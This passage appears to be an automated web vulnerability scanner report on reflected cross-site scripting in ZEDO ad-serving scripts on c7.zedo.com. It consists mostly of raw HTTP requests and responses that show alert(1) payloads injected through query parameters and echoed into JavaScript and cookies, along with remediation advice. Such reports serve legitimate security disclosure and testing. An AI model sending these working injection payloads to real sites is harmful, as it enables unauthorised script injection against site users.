User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129
Response (redirected)
HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:693e2";alert(1)//dacff80c547;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=131
Expires: Thu, 03 Feb 2011 16:12:04 GMT
Date: Thu, 03 Feb 2011 16:09:53 GMT
Connection: close
Content-Length: 2524
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=134;var zzPat=',693e2";alert(1)//dacff80c547';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=,693e2";alert(1)//dacff80c547;z="+Math.random();}
The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a18d5"%3balert(1)//fb81859235a was submitted in the $ parameter. This input was echoed as a18d5";alert(1)//fb81859235a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. As with the previous zedo.com finding, the payload terminates only the double-quoted zzStr literal in the response below, and the // comments out the } that closes the enclosing if block; confirm in a browser that the script still parses and that the injected call runs before rating the finding. The value is again written into the FFpb cookie.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where a value must be emitted inside a JavaScript string literal, it should be escaped for that context before output (the backslash, both quote characters, line terminators and, for script embedded in an HTML page, the < and / characters), for example as \xHH or \uHHHH sequences; HTML entity encoding on its own does not protect a script context.
Response
HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:a18d5";alert(1)//fb81859235a;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,175,14:1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
Vary: Accept-Encoding
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=133
Expires: Thu, 03 Feb 2011 16:12:04 GMT
Date: Thu, 03 Feb 2011 16:09:51 GMT
Connection: close
Content-Length: 2511
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=134;var zzPat=',a18d5";alert(1)//fb81859235a';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=,a18d5";alert(1)//fb81859235a;z="+Math.random();}
The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6763'%3balert(1)//afd391d5acc was submitted in the $ parameter. This input was echoed as a6763';alert(1)//afd391d5acc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/c5/jsc/fm.js?c=175&a=0&f=&n=1220&r=13&d=9&q=&$=a6763'%3balert(1)//afd391d5acc&s=134&z=0.00999015336856246 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129
Response (redirected)
HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:a6763';alert(1)//afd391d5acc;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=130
Expires: Thu, 03 Feb 2011 16:12:04 GMT
Date: Thu, 03 Feb 2011 16:09:54 GMT
Connection: close
Content-Length: 2524

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=134;var zzPat=',a6763';alert(1)//afd391d5acc';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=,a6763';alert(1)//afd391d5acc;z="+Math.random();}
The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0b32'%3balert(1)//539eff4924d was submitted in the $ parameter. This input was echoed as a0b32';alert(1)//539eff4924d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:a0b32';alert(1)//539eff4924d;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,175,14:1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
Vary: Accept-Encoding
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=133
Expires: Thu, 03 Feb 2011 16:12:04 GMT
Date: Thu, 03 Feb 2011 16:09:51 GMT
Connection: close
Content-Length: 2511

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=134;var zzPat=',a0b32';alert(1)//539eff4924d';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=,a0b32';alert(1)//539eff4924d;z="+Math.random();}
1.84. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://c7.zedo.com
Path: /bar/v16-401/c5/jsc/fm.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e0a0'-alert(1)-'be3b67982cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/c5/jsc/fm.js?8e0a0'-alert(1)-'be3b67982cf=1 HTTP/1.1
Host: c7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; FFcat=1220,175,9:1220,175,14; ZFFAbh=749B826,20|1483_759#365; FFad=1:1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; __qca=P0-2130372027-1295906131971;
Response
HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 985
Content-Type: application/x-javascript
Set-Cookie: FFad=0:1:1;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=0,0,0:1220,175,9:1220,175,14;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=412
Expires: Thu, 03 Feb 2011 16:18:54 GMT
Date: Thu, 03 Feb 2011 16:12:02 GMT
Connection: close

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=0;var zzPat='';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=;z="+Math.random();}
The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c38c1'%3balert(1)//9f2a1335fe8 was submitted in the q parameter. This input was echoed as c38c1';alert(1)//9f2a1335fe8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,175,14:1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
Vary: Accept-Encoding
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=133
Expires: Thu, 03 Feb 2011 16:12:04 GMT
Date: Thu, 03 Feb 2011 16:09:51 GMT
Connection: close
Content-Length: 2508

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=134;var zzPat='c38c1';alert(1)//9f2a1335fe8';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=c38c1';alert(1)//9f2a1335fe8;z="+Math.random();}
The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e516d"%3balert(1)//8a8f531ed29 was submitted in the q parameter. This input was echoed as e516d";alert(1)//8a8f531ed29 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,175,14:1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
Vary: Accept-Encoding
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=133
Expires: Thu, 03 Feb 2011 16:12:04 GMT
Date: Thu, 03 Feb 2011 16:09:51 GMT
Connection: close
Content-Length: 2508

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=134;var zzPat='e516d";alert(1)//8a8f531ed29';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=e516d";alert(1)//8a8f531ed29;z="+Math.random();}
The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed98c"%3balert(1)//2c617412c80 was submitted in the q parameter. This input was echoed as ed98c";alert(1)//2c617412c80 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/c5/jsc/fm.js?c=175&a=0&f=&n=1220&r=13&d=9&q=ed98c"%3balert(1)//2c617412c80&$=&s=134&z=0.00999015336856246 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129
Response (redirected)
HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=132
Expires: Thu, 03 Feb 2011 16:12:04 GMT
Date: Thu, 03 Feb 2011 16:09:52 GMT
Connection: close
Content-Length: 2521

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=134;var zzPat='ed98c";alert(1)//2c617412c80';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=ed98c";alert(1)//2c617412c80;z="+Math.random();}
The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f44fa'%3balert(1)//438e80c48dc was submitted in the q parameter. This input was echoed as f44fa';alert(1)//438e80c48dc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/c5/jsc/fm.js?c=175&a=0&f=&n=1220&r=13&d=9&q=f44fa'%3balert(1)//438e80c48dc&$=&s=134&z=0.00999015336856246 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129
Response (redirected)
HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=132
Expires: Thu, 03 Feb 2011 16:12:04 GMT
Date: Thu, 03 Feb 2011 16:09:52 GMT
Connection: close
Content-Length: 2521

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=134;var zzPat='f44fa';alert(1)//438e80c48dc';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=f44fa';alert(1)//438e80c48dc;z="+Math.random();}
The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38718"%3balert(1)//62cf392d211 was submitted in the $ parameter. This input was echoed as 38718";alert(1)//62cf392d211 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/c5/jsc/fmr.js?c=175&a=0&f=&n=1220&r=13&d=9&q=&$=38718"%3balert(1)//62cf392d211&s=134&z=0.00999015336856246 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; ZCBC=1
Response
HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:38718";alert(1)//62cf392d211;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=125
Expires: Thu, 03 Feb 2011 16:12:04 GMT
Date: Thu, 03 Feb 2011 16:09:59 GMT
Connection: close
Content-Length: 2512

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=134;var zzPat=',38718";alert(1)//62cf392d211';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=,38718";alert(1)//62cf392d211;z="+Math.random();}
